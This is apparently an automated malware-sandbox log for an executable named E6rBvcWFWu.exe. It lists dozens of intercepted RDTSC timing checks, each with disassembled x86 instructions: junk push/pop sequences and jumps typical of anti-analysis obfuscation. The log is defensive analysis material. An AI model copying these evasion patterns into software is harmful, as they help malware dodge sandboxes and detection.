Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F7ECF1 second address: F7ECFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jne 00007F577C53EFCCh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F7EE46 second address: F7EE4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F7EE4E second address: F7EE6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F577C53EFD4h 0x00000009 popad 0x0000000a jnc 00007F577C53EFC8h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F7EFD8 second address: F7EFDD instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F7EFDD second address: F7EFF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F577C53EFC6h 0x0000000a pop edi 0x0000000b push eax 0x0000000c push edx 0x0000000d ja 00007F577C53EFC6h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F7EFF0 second address: F7EFF4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F7EFF4 second address: F7F000 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F7F000 second address: F7F006 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F7F006 second address: F7F015 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 push edi 0x00000007 pop edi 0x00000008 pop edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push esi 0x0000000c pop esi 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F7F015 second address: F7F019 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F7F019 second address: F7F039 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F577C53EFD6h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F7F039 second address: F7F03D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F7F2D4 second address: F7F2E9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F577C53EFCDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c pop eax 0x0000000d rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F7F635 second address: F7F662 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F577C5415C6h 0x0000000a popad 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push esi 0x0000000f pop esi 0x00000010 pushad 0x00000011 popad 0x00000012 pop eax 0x00000013 jmp 00007F577C5415D5h 0x00000018 pushad 0x00000019 pushad 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F84634 second address: F84659 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F577C53EFD9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jbe 00007F577C53EFC6h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F84659 second address: F84687 instructions: 0x00000000 rdtsc 0x00000002 js 00007F577C5415C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F577C5415D0h 0x00000011 jmp 00007F577C5415D2h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F84AC1 second address: F84AC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F84AC5 second address: F84ACB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F84ACB second address: F84AF4 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F577C53EFCCh 0x00000008 jnp 00007F577C53EFC6h 0x0000000e jnp 00007F577C53EFC8h 0x00000014 push esi 0x00000015 pop esi 0x00000016 pop edx 0x00000017 pop eax 0x00000018 push eax 0x00000019 push edx 0x0000001a jng 00007F577C53EFCCh 0x00000020 pushad 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F84AF4 second address: F84B13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F577C5415D9h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F84B13 second address: F84B1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F84C98 second address: F84CA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jng 00007F577C5415D2h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F84CA5 second address: F84CAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F84CAB second address: F84CB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F371D1 second address: F371D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F850BB second address: F850BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F838EA second address: F83907 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F577C53EFD3h 0x00000007 jbe 00007F577C53EFC6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F83907 second address: F83927 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007F577C5415CDh 0x00000008 jp 00007F577C5415C6h 0x0000000e pop eax 0x0000000f pushad 0x00000010 push edi 0x00000011 pop edi 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 pop eax 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F89EBC second address: F89EC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F89EC2 second address: F89F03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F577C5415D6h 0x00000009 popad 0x0000000a pushad 0x0000000b push edi 0x0000000c pop edi 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 jmp 00007F577C5415D6h 0x00000015 push eax 0x00000016 push edx 0x00000017 jc 00007F577C5415C6h 0x0000001d push edi 0x0000001e pop edi 0x0000001f rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F8D0F0 second address: F8D0F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F8D0F6 second address: F8D101 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop ecx 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 push edi 0x0000000a pop edi 0x0000000b rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F8D101 second address: F8D117 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F577C53EFD2h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F8D117 second address: F8D120 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F8D120 second address: F8D12D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F8D12D second address: F8D131 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F8D131 second address: F8D141 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnc 00007F577C53EFC6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F8D141 second address: F8D145 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F9280D second address: F92813 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F92813 second address: F92819 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F92819 second address: F92823 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F577C53EFC6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F92823 second address: F92829 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F92829 second address: F9283F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jnl 00007F577C53EFCCh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F9283F second address: F92845 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F92845 second address: F92849 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F92849 second address: F9284F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F91B77 second address: F91B7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F91B7D second address: F91B88 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F920CE second address: F920D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F920D3 second address: F920DD instructions: 0x00000000 rdtsc 0x00000002 jne 00007F577C5415DDh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F920DD second address: F920F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F577C53EFD1h 0x00000009 push eax 0x0000000a push edx 0x0000000b push edi 0x0000000c pop edi 0x0000000d rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F3671A second address: F36720 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F5710E second address: F57112 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F573E1 second address: F573E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F573E7 second address: F573EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F573EB second address: F57413 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F577C5415CFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push esi 0x00000010 pop esi 0x00000011 jmp 00007F577C5415CCh 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F57541 second address: F57545 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F57545 second address: F5754B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F57667 second address: F5766D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F57663 second address: F57667 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F57FA2 second address: F57FA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F57FA6 second address: F371D1 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F577C5415C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e push 00000000h 0x00000010 push edx 0x00000011 call 00007F577C5415C8h 0x00000016 pop edx 0x00000017 mov dword ptr [esp+04h], edx 0x0000001b add dword ptr [esp+04h], 0000001Ch 0x00000023 inc edx 0x00000024 push edx 0x00000025 ret 0x00000026 pop edx 0x00000027 ret 0x00000028 movzx edi, ax 0x0000002b call dword ptr [ebp+12A03779h] 0x00000031 jmp 00007F577C5415CEh 0x00000036 push eax 0x00000037 push edx 0x00000038 pushad 0x00000039 je 00007F577C5415C6h 0x0000003f jmp 00007F577C5415D0h 0x00000044 popad 0x00000045 push ecx 0x00000046 push ecx 0x00000047 pop ecx 0x00000048 pop ecx 0x00000049 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F960C0 second address: F960C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F960C4 second address: F960D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F577C5415CBh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F960D8 second address: F960DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F9621D second address: F96245 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jbe 00007F577C5415C6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d ja 00007F577C5415C6h 0x00000013 push edx 0x00000014 pop edx 0x00000015 jmp 00007F577C5415CCh 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d push ebx 0x0000001e pop ebx 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F96245 second address: F96249 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F963A9 second address: F963AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F963AD second address: F963CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jns 00007F577C53EFDBh 0x0000000c rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F96527 second address: F9652C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F96716 second address: F9671A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F9671A second address: F96725 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F96725 second address: F9672A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F9685B second address: F96865 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F577C5415C6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F96865 second address: F968A8 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F577C53EFCAh 0x00000008 push edi 0x00000009 jmp 00007F577C53EFD3h 0x0000000e jg 00007F577C53EFC6h 0x00000014 pop edi 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push eax 0x00000018 push edx 0x00000019 push edi 0x0000001a jmp 00007F577C53EFD6h 0x0000001f pop edi 0x00000020 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F968A8 second address: F968AD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F96BBA second address: F96BC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jnp 00007F577C53EFCCh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F96BC7 second address: F96C14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 jo 00007F577C5415D8h 0x0000000d push eax 0x0000000e pop eax 0x0000000f jmp 00007F577C5415D0h 0x00000014 pushad 0x00000015 jne 00007F577C5415C6h 0x0000001b jmp 00007F577C5415D1h 0x00000020 jmp 00007F577C5415CFh 0x00000025 jg 00007F577C5415C6h 0x0000002b popad 0x0000002c rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F96C14 second address: F96C20 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jne 00007F577C53EFC6h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F96C20 second address: F96C24 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F96C24 second address: F96C34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jng 00007F577C53EFC6h 0x0000000e push eax 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F99FAC second address: F99FB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F0E99F second address: F0E9B5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F577C53EFCDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F0E9B5 second address: F0E9B9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F0E9B9 second address: F0E9E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F577C53EFD5h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jmp 00007F577C53EFD0h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F0E9E7 second address: F0EA0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F577C5415C6h 0x0000000a jmp 00007F577C5415D3h 0x0000000f popad 0x00000010 jc 00007F577C5415DCh 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F99BF1 second address: F99BFB instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F99BFB second address: F99C01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F99C01 second address: F99C05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F99C05 second address: F99C09 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F9C5B1 second address: F9C5B6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F9C5B6 second address: F9C5BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F9C5BE second address: F9C5CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F577C53EFC6h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F9C5CD second address: F9C5D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F9C5D1 second address: F9C5E9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F577C53EFD4h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F9C197 second address: F9C1A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F577C5415C6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F9C1A1 second address: F9C1A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
